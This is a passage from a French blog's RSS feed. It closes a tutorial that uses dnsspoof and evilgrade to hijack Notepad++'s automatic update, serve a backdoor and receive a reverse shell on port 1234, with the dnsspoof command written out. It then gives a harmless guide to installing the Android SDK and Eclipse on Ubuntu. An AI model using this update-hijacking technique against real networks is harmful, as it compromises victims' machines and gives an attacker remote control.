<p>&nbsp;</p>
<h2>Adaptation face à un refus du serveur DNS de se lancer</h2>
<p>Ayant rencontré quelques problèmes avec le serveur DNS intégrer à evilgrade, je me suis retourné sur <b>dnsspoof</b>.<br />
A travers une autre console, nous allons donc utiliser cet utilitaire pour usurper l&#8217;identité du serveur <b>notepad-plus.sourceforge.net</b>.</p>
<pre class="brush: bash;">
root@bt:# vi hosts
-
10.0.0.1        notepad-plus.sourceforge.net
root@bt:# dnsspoof -i eth0 -f hosts
</pre>
<p>&nbsp;</p>
<h2>Vue par le poste cible</h2>
<p>Du côté du poste de la victime, si la mise à jour automatique est activée, notepad++ va rechercher lors de son lancement la présence d&#8217;une mise à jour sur le site de l&#8217;éditeur.<br />
Avec <b>DnsSpoof</b>, désormais le site de l&#8217;éditeur est le serveur evilgrade.<br />
Evilgrade va alors informer le pc cible qu&#8217;une mise à jour est disponible prête à être téléchargée. Notepad++ va ainsi télécharger la backdoor fournit et l&#8217;exécuter&#8230;sniff&#8230;c&#8217;est la fin..</p>
<p>En effet, lors de l&#8217;exécution de la backdoor, le pc cible va ouvrir une connexion sur le serveur evilgrade sur le <b>port 1234</b>. Vous devriez obtenir à ce moment là un beau terminal en lieu et place de votre <b>netcat</b> avec <b>C:\Program Files\&#8230;</b></p>
<p>&nbsp;</p>
<h2>Conclusion</h2>
<p>Pour conclure méfiez vous des mises à jours automatiques surtout sur un réseau local (non connecté à l&#8217;Internet). </p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/linux-securite/security-evilgrade/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Android + Ubuntu 10.10 &#8211; Mise en place d&#8217;une plateforme de Développement</title>
		<link>http://kidrek.fr/blog/android/android-mise-en-place-plateforme-dveloppement/</link>
		<comments>http://kidrek.fr/blog/android/android-mise-en-place-plateforme-dveloppement/#comments</comments>
		<pubDate>Mon, 15 Aug 2011 12:32:29 +0000</pubDate>
		<dc:creator>kidrek</dc:creator>
				<category><![CDATA[Android]]></category>
		<guid isPermaLink="false">http://kidrek.fr/blog/?p=1627</guid>
		<description><![CDATA[Depuis peu, je me suis mis à développer des applications Android, et par la même occasion, à poster quelques astuces sur le blog. Mais avant toute chose, j&#8217;ai omis d&#8217;expliquer comment installer le SDK Android et les pré-requis afin de débuter le développement d&#8217;application. Les applications Android sont basées sur le langage de programmation orienté [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1616" title="android_kidrek_logo" src="http://kidrek.fr/blog/wp-content/uploads/2010/11/android_kidrek_logo.jpg" alt="" width="60" height="34" /> Depuis peu, je me suis mis à développer des applications Android, et par la même occasion, à poster quelques astuces sur le blog.<br />
Mais avant toute chose, j&#8217;ai omis d&#8217;expliquer comment installer le SDK Android et les pré-requis afin de débuter le développement d&#8217;application.<br />
Les applications Android sont basées sur le langage de programmation orienté JAVA, et qui dit Java, dit développement sur Eclipse.</p>
<p><span id="more-1627"></span></p>
<p>&nbsp;</p>
<p><H2>Installation des pré-requis</H2></p>
<p>Nous allons débuter par l&#8217;installation des pré-requis, OpenJDK qui implémentera la machine virtuelle java, et eclipse l&#8217;interface de développement/débogage. </p>
<pre class="brush: bash;">
# apt-get install openjdk-6-jdk eclipse ant
</pre>
<p>- Lorsque l&#8217;installation s&#8217;est terminée correctement, nous allons configurer eclipse pour attaquer les dépôts de Google. Pour ce faire, il suffit de le lancer et de sélectionner : “Help” / “Install new software” / “Add” button&nbsp;&raquo; et insérer les données suivantes :<br />
    * name: android<br />
    * url: http://dl-ssl.google.com/android/eclipse<br />
et valider.<br />
- Une fois que &laquo;&nbsp;Eclipse&nbsp;&raquo; aura parcouru les sources Google, sélectionnez ce que vous souhaitez installer.</p>
<p>&nbsp;</p>
<p><H2>Téléchargement et Installation du kit de développement SDK d&#8217;Android</H2></p>
<p>Dans un premier temps, nous allons téléchargé le SDK à l&#8217;URL suivante : <b>http://developer.android.com/sdk/index.html</b><br />
* Sélectionner  Linux(i386) version : actuellement la version est la <b>r12</b><br />
* Une fois téléchargée, il suffit d&#8217;extraire l&#8217;archive et de lancer Eclipse. Rendez-vous dans les préférences <i>&laquo;&nbsp;Window / Preferences / Android&nbsp;&raquo;</i>, et sélectionnez le répertoire du SDK.<br />
* Ensuite, il ne reste plus qu&#8217;à installer les librairies correspondant à la version d&#8217;android que l&#8217;on souhaite utiliser pour nos applis <i>&laquo;&nbsp;Window / Android SDK and AVD MANAGER / Available packages&nbsp;&raquo;</i>, selectionnez SDK Plateform 2.2 &#038; 2.3 les plus utilisés actuellement.</p>
<pre class="brush: css;">
	-- Install selected
	-- Accept All
	-- Restart ADB
</pre>
</p>
<p>&nbsp;</p>
<p><H2>Création de l&#8217;émulateur</H2></p>
<p>Pour pouvoir tester vos applications tout au long de la phase de développement, rien de tel qu&#8217;un émulateur de téléphone. Voici la procédure pour la création à partir de l&#8217;interface d&#8217;eclipse :
</p>
<p><pre class="brush: css;">
 &quot;Window / Android SDK and AVD MANAGER / Virtual Devices / New&quot;
	-- Choose name
	-- choose Target : Android 2.3 or 2.2
	-- SD Card : Size Storage when apps go install
	-- you can also add hardware recommandation for example &quot;Max VM application Heap&quot;, that limit the memory use by your apps.
</pre>
</p>
<p>&nbsp;</p>
<p>Enjoy&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://kidrek.fr/blog/android/android-mise-en-place-plateforme-dveloppement/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using memcached (Feed is rejected)
Database Caching using memcached
Object Caching 918/996 objects using apc

Served from: kidrek.fr @ 2012-05-20 02:26:28 -->
